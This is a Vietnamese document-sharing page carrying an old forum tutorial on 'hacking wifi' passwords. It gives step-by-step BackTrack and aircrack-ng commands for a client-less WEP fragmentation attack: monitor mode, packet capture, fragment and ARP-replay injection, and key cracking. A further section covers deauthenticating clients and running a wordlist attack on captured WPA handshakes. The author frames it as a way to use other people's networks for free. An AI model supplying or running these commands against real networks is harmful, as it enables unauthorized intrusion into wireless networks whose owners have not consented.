intTypePromotion=1

TỔNG HỢP HACK WIFI

Chia sẻ: Quoctri1905 Quoctri | Ngày: | Loại File: DOC | Số trang:4

0
340
lượt xem
133
download

TỔNG HỢP HACK WIFI

Mô tả tài liệu
  Download Vui lòng tải xuống để xem tài liệu đầy đủ

Nói là lậu nhưng "key xịn", hehehe. Thôi không dài dòng nữa, topic hack password dạng Wepkey nhiều rồi nhưng hướng dẫn dùng kỹ thuật Fragment để hack thì chưa có 1 topic đàng hoàng tới. Bởi vậy, hôm nay Lãng tử xin mạo muội hướng dẫn các bạn dùng Fragment để hack pass không cần client

Chủ đề:
Lưu

Nội dung Text: TỔNG HỢP HACK WIFI

  1. TỔNG HỢP HACK WIFI Hack pass wifi WEP key with Fragment no client đăng 23:21 08-04-2011 bởi vuong truong [ đã cập nhật 23:46 08-04-2011 ] Có thể nói hack pass Wifi là đề tài muôn thuở và mình đang online với các bạn cũng bằng wi Nói là lậu nhưng "key xịn", hehehe. Thôi không dài dòng nữa, topic hack password dạng Wep nhiều rồi nhưng hướng dẫn dùng kỹ thuật Fragment để hack thì chưa có 1 topic đàng hoàng tới. Bởi vậy, hôm nay Lãng tử xin mạo muội hướng dẫn các bạn dùng Fragment để hack pass không cần client Nói đến đây chắc các bạn nào mới tập tành hack pass wifi sẽ không hiểu. Không sao, mình s dẫn từ đầu cho các bạn nào "mới vào nghề" luôn: Phần 1: Giới thiệu và hướng dẫn về BackTrack  Tóm tắt phần 1 cho những ai lười đọc: Công cụ cần dùng: - Phần mềm BackTrack 4 (BT4), download tại đây: http://www.backtrack-linux.org/download USB (dung lượng tùy vào bản bạn down) hoặc đĩa DVD để burn file .iso vừa down về - Phần mềm burn file .iso về đĩa DVD (nếu muốn boot bằng USB thì khỏi cần cái này) Hướng dẫn boot BT4 bằng USB: (Mình đã test với bản BT4 beta và USB 1GB) Các bạn giải nén file .iso vừa down về (dùng Ultra Iso hoặc Winrar) sẽ được 2 folder là boot Copy 2 folder này vào USB Sau đó vào ổ USB -> Vào boot -> Vào bootinst.bat. Ta sẽ được:
  2. Bấm phím bất kỳ, ta sẽ được: Bấm phím bất kỳ để hoàn thành. Vậy là "đồ nghề" đã xong ta tiến hành boot với USB hoặc đĩa DVD. Bạn nào chưa chỉnh thứ boot thì vào BIOS chỉnh lại nhé, để ổ USB và DVD lên trên ổ cứng. Ta tiến hành boot để vào Cắm USB vào và bật máy tính, cứ để cho nó tự chạy. Đến khi nó đòi log on thì: -User: root -Pass: toor (Lưu ý có nhiều máy khi gõ pass sẽ không hiển thị gì hết, bạn yên tâm cứ việc g nó có hiển thị hay không) Tiếp theo ta gõ: startx Vậy là vào được BT4 rồi đó. Mở 1 Shell (biểu tượng ô vuông màu đen ở góc trái dưới cùng đ theo các bước sau........... Các bạn có thể làm theo hướng dẫn như trong tài liệu sau. Hoặc dùng thẳng kỹ thuật Fragme 2 sẽ bảo đảm chắc chắn hack được pass Wepkey Phần 2: Hướng dẫn kỹ thuật Fragment Tại sao phải cần đến kỹ thuật này?
  3. - Vì chúng ta cần 1 máy victim đang kết nối với BSSID cần hack mà victim không có (chờ m có ai truy cập). - Có máy victim nhưng chỉ chat thôi hay sao ấy, data không tăng hoặc tăng rất chậm, chờ... cả chẳng đủ 2500 Ivs, nói chi có thể phải cần hơn thế nữa Và... 1 vài nguyên nhân khác Nếu bạn đang hack mà rơi vào các trường hợp trên hãy khởi động lại Back Track và dùng Fr Các bước thực hiện: Phần trong ngoặc đơn () là chú thích nhé Bước 1: Mở 1 Shell và gõ airmon­ng Bước 2: airmon­ng start wlan0  (ở đây card wireless của mình là wlan0) Bước 3: airodump­ng Bước 4: airodump­ng mon0  (đã chuyển sang chế độ monitor) Bước 5: airodump­ng ­­bssid {địa chỉ MAC của BSSID cần hack} ­­channel {channel của BS hack} ­­ivs ­w capturefile mon0   (capturefile là tên của file mà data được lưu vào, bạn có thể  cũng được nhưng đến bước cuối nhớ viết đúng tên file này nhé ) Bước 6: Mở 1 shell khác và gõ: aireplay­ng ­5 ­b {địa chỉ MAC của BSSID cần hack} mon0  (­5 chính là fragment đó các bạn Chờ 1 tý và chọn Yes, gõ chữ "y" đó. Bước 7: Mở 1 Shell khác aireplay­ng ­1 1 ­a {địa chỉ MAC của BSSID cần hack} mon0 Bấm Ctrl + C
  4. Quay lại Shell thứ 2 bạn sẽ thấy xuất hiện file có dạng .xor  (Có là ta đã thành công rồi đó)  Bước 8: Vẫn ở Shell thứ 2 nhé packetforge­ng ­0 ­a {địa chỉ MAC của BSSID cần hack} ­h 00:11:22:33:44:55 ­k 255.255.25 255.255.255.255 ­y fragment­ {tênfile.xor} ­w arpy Bước 9: aireplay­ng ­3 ­r arpy ­b {địa chỉ MAC của BSSID cần hack} mon0 Nếu thấy data tăng vù vù thì chắc chắn 99,99% ta đã thành công và pass đã hack được rồi đó Bước 10: Đây là bước cuối cùng dùng để bẻ khóa lượng data mà ta thu về aircrack­ng ­b {địa chỉ MAC của BSSID cần hack} capturefile*.ivs Xong rồi đó, lập lại bước này nếu BT yêu cầu cần thêm data bạn nhé Và cuối cùng là... là ta đã có pass sau bao ngày chờ đợi chứ còn gì nữa. Hahaahahaaaa sướng q aaaaaaaaaa MORE 2 Đến bước 3 -> 4 + ctrl c 1. airodump-ng –c chanel –w capturefilename mon0 new 2 + aireplay-ng -0 1 –c essid mon0 + aireplay-ng -0 1 –c station –c bssid mon0 New 2 or 3 Xem new đầu tiên, sau đó qua new 2 or new 3 + dir + aircrack-ng –w /Desktop/test.lst capturefilename.cap Nếu không đúng tên thì: Mở new Aircrack-ng –w /Desktop/test.lst capturefilename-01.cap (hoặc chép tên filename)

CÓ THỂ BẠN MUỐN DOWNLOAD

 

Đồng bộ tài khoản